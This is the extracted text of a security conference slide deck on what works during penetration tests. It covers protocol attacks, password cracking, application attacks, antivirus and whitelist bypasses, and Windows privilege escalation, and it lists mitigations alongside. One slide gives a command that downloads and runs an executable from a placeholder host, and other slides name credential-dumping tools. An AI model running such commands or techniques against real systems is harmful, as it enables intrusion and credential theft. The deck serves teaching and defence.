Secure360 - Attack All the Layers! Again!

AT

TA

CK

AL

L T

HE

LA

YE

RS

- A

GA

I N! :

WH

AT

’ S W

OR

KI N

G D

UR

I NG

PE

N T

ES

TS

SC

OT T

SU

TH

ER

L AN

D A

ND

KA

RL F

OS

AA

EN

MA

Y 1

4,

1: 3

0 P

M

INTRODUCTIONS

Scott Sutherland Principal Security Consultant @ NetSPI Twitter: @_nullbind

Karl Fosaaen Senior Security Consultant @ NetSPI Twitter: @kfosaaen

We specialize in both things and stuff!

OVERVIEW

• Why do companies pen test?

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

• Conclusions

http://www.sxc.hu/browse.phtml?f=download&id=1372604

WHY DO COMPANIES PEN TEST?

• Compliance requirements

• Evaluate risks associated with an acquisition or partnership

• Validate preventative controls

• Validate detective controls

• Prioritize internal security initiatives

• Proactively prevent breaches


OVERVIEW






ATTACKING PROTOCOLS

• ARP: Address Resolution Protocol

• NBNS: NetBIOS Name Service

• SMB: Server Message Block

• PXE: Preboot Execution Environment

• DTP: Dynamic Trunking Protocol

ATTACKING PROTOCOLS: ARP

Address Resolution Protocol


• General MAC to IP associationLayer 2

• Conditions Independent of user actionBroadcast network

• AttacksMITM MonitoringMITM InjectionDOS



Common mitigating controls:

• Dynamic ARP Inspection

• Port Security

• Static Routes (not recommended)

ATTACKING PROTOCOLS: NBNS / LLMNR

NetBIOS Name Service

ATTACKING PROTOCOLS: NBNS

• General IP to hostname association Layer 5 / 7

• Constraints Dependent on user action Broadcast Network Windows Only

• Attacks MITM Monitoring MITM Injection DOS





Common mitigating controls:• Create a WPAD (Web Proxy Auto-Discovery)

server entry in DNS

• Disable NBNS

• Disable insecure authentication methods to help

limit impact of exposed hashes

• Enable packet signing to help prevent

SMB Relay attacks

ATTACKING PROTOCOLS: SMB

ServerMessageBlock


• GeneralSMB is the come back kid!Layer 7

• ConstraintsDependent on user actionAny routable networkNo connecting back to originating host

• AttacksCommand executionShells..aaand shells



Historically SMB Relay has been used to:

• Execute arbitrary commands

• Obtain shells

Lately the community has been developing tools for doing things like:

• LDAP queries

• SQL queries

• Exchange services

• Mounting file systems



• Enable packet signing to help prevent SMB Relay attacks

• Apply really old patches like if you missed out on the last decade…

ATTACKING PROTOCOLS: PXE

PrebooteXecutionEnvironment


• GeneralDHCP

• AttacksRogue PXE serverCommand executionAccess to unencrypted drive imagesShells..aaand shells



• MAC/IP filters

• Limit PXE to specific networks

• Network Access Controls - NAC

ATTACKING PROTOCOLS: DTP

Dynamic Trunking Protocol



• Use dedicated VLAN ID for all trunking ports

• Disable all unused ports and place them on a non routable VLAN

• Configure all user ports as access ports

to prevent trunk negotiation

• Configure frames with two 8021Q headers

• Configure strong VACLs


• General 802.1Q encapsulation is in use Layer 2

• Constraints Independent of user action Trunking is set to enabled or auto on switch port

• Attacks Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default *Full VLAN hopping







• Use dedicated VLAN ID for all trunking ports

• Disable all unused ports and place them on a non routable VLAN

• Configure all user ports as access ports

to prevent trunk negotiation

• Configure frames with two 8021Q headers

• Configure strong VACLs

OVERVIEW






ATTACKING PASSWORDS

• Hashes and Cracking (Offline)• Dictionary Attacks (Online)• Dump in Cleartext!


ATTACKING PASSWORDS

Tool Function Year

Pass the Hash Passing Hashes 1997

Rainbow Tables Password Cracking 2000s

SMB Relay Relaying Captured Hashes 2001

John the Ripper Password Cracking 2001

NetNTLM.pl Cracking Network Hashes 2007

PTH Toolkit Pass all the Hashes 2008

Hashcat CPU and GPU Cracking 2010

WCE and Mimikatz Cleartext Windows Creds 2012

ATTACKING PASSWORDS: DICTIONARY

• Online Vs. Offline Attacks• Dictionary Attacks

Enumerate users- Null SMB logins, RPC, *SID BF,

SNMP, LDAP, SharePoint, etcAttack!

• Are users getting smarter?Sort of… - “Spring2014” meets password complexity requirements


ATTACKING PASSWORDS: HASHES

• What are hashes?A non-reversible way of storing passwordsOperating systems and applicationsLots of typesLM/NTLM

Network and Local MD5 SHA descrypt

ATTACKING PASSWORDS: HASHES

• How do we get hashes?Cain and AbelfgdumpMetasploitMimikatzDatabasesConfig files

ATTACKING PASSWORDS: CRACKING

• Cracking HashesRainbow TablesJohn the RipperoclHashcatCPU versus GPU

ATTACKING PASSWORDS: CRACKING

Min

ute

s

0

100

200

300

400

500

600

Minutes for Six Character Brute Force

CPU GPU

9 Hou

rs

24

Seco

nds

ATTACKING PASSWORDS: CRACKINGG

PU

CPU

ATTACKING PASSWORDS: CLEARTEXT

Common application configsReversible Formats

Find in filesGroups.xmlUnattend.xmlSysprep

RegistryWCEMimikatz

OVERVIEW






ATTACKING APPLICATIONS: COMMON

• Default and weak passwords

• SQL injection

• RFI/web shells

• Web directory traversals

• UNC path injection + SMB relay

• Critical missing patches

ATTACKING APPLICATIONS: BREAKOUTS

• Obtain a common dialog box

• Bypass folder path and file type restrictions

• Bypass file execution restrictions

• Bypass file black/white lists

• Access to native consoles and management tools

• Downloading and use third party applications

OVERVIEW






BYPASSING EPP: ANTI-VIRUS

• Powershell Code Injection

• Execute off network share

• Clone resource tables

• Modify import tables

• Pack files

BYPASSING EPP: APP WHITE LIST

• Rename executables

• Execution via approved apps

- Powershell Code Injection

- Rundll32 mydll,DLLMain@12

- IEExec http://x.x.x.x:8080/bypass.exe

- cmd /c file.exe

• Directory Exceptions

• Disable Services

• Poisoning updates and approved file lists

OVERVIEW






WINDOWS ESCALATION: OVERVIEW

• Privilege Escalation Goals• Local Privilege Escalation• Domain Privilege Escalation

WINDOWS ESCALATION: GOALS

Local Escalation Goals Find clear text or reversible credentials with local administrative

privileges Get application to run commands as Administrator or LocalSystem

Domain Escalation Goals Find Domain Admins Impersonate Domain Admins

WINDOWS ESCALATION: LOCAL

Local Escalation *Clear text credentials in files, registry, over network Insecure service paths DLL preloading DLL and exe replacement Binary planting in auto-run locations (reg and file system) Modifying schedule tasks *Local and remote exploits Leverage local application like IIS, SQL Server etc *UNC path injection + SMB Relay / Capture + crack

WINDOWS ESCALATION: DOMAIN

Domain Escalation – Find DAs Check locally! (Processes,Tokens, Cachedump) Review active sessions - netsess Review remote processes - tasklist Service Principal Names (SPN) – get-spn Scanning Remote Systems for NetBIOS Information - nbtscan Pass the hash to other systems PowerShell shell spraying WINRM/WINRS shell spraying Psexec shell spraying

WINDOWS ESCALATION: DOMAIN

Domain Escalation – Impersonate DAs

Dump passwords from memory with Mimikatz Migrate into the Domain Admin’s process Steal Domain Admins delegation tokens with Incognito Dump cached domain admin hashes with cachedump

Relatively new techniques PTH using Kerberos ticket

CONCLUSIONS

All can kind of be fixed

Most NetworksKind of broken

Most ProtocolsKind of broken

Most ApplicationsKind of broken


ATTACK ALL THE LAYERS!

ANY QUESTIONS?

ATTACK ALL THE LAYERS!

Scott SutherlandPrincipal Security ConsultantTwitter: @_nullbind

Karl FosaaenSenior Security ConsultantTwitter: @kfosaaen

http://images.google.com/url?sa=i&rct=j&q=thinking+monkey&source=images&cd=&cad=rja&docid=FezL9Kq4q1re-M&tbnid=uaud6lmrkPHsGM:&ved=0CAUQjRw&url=http://www.metalsucks.net/2011/12/16/years-end-addendum-the-year-in-which-i-was-more-pretentious-than-usual/&ei=_rKRUc3JNOeNyAG-m4HYAw&bvm=bv.46471029,d.aWc&psig=AFQjCNGz2iQMrOIySn3vsc4OnUgtepFHrg&ust=1368589404053200

Technology

Secure360 - Attack All the Layers! Again!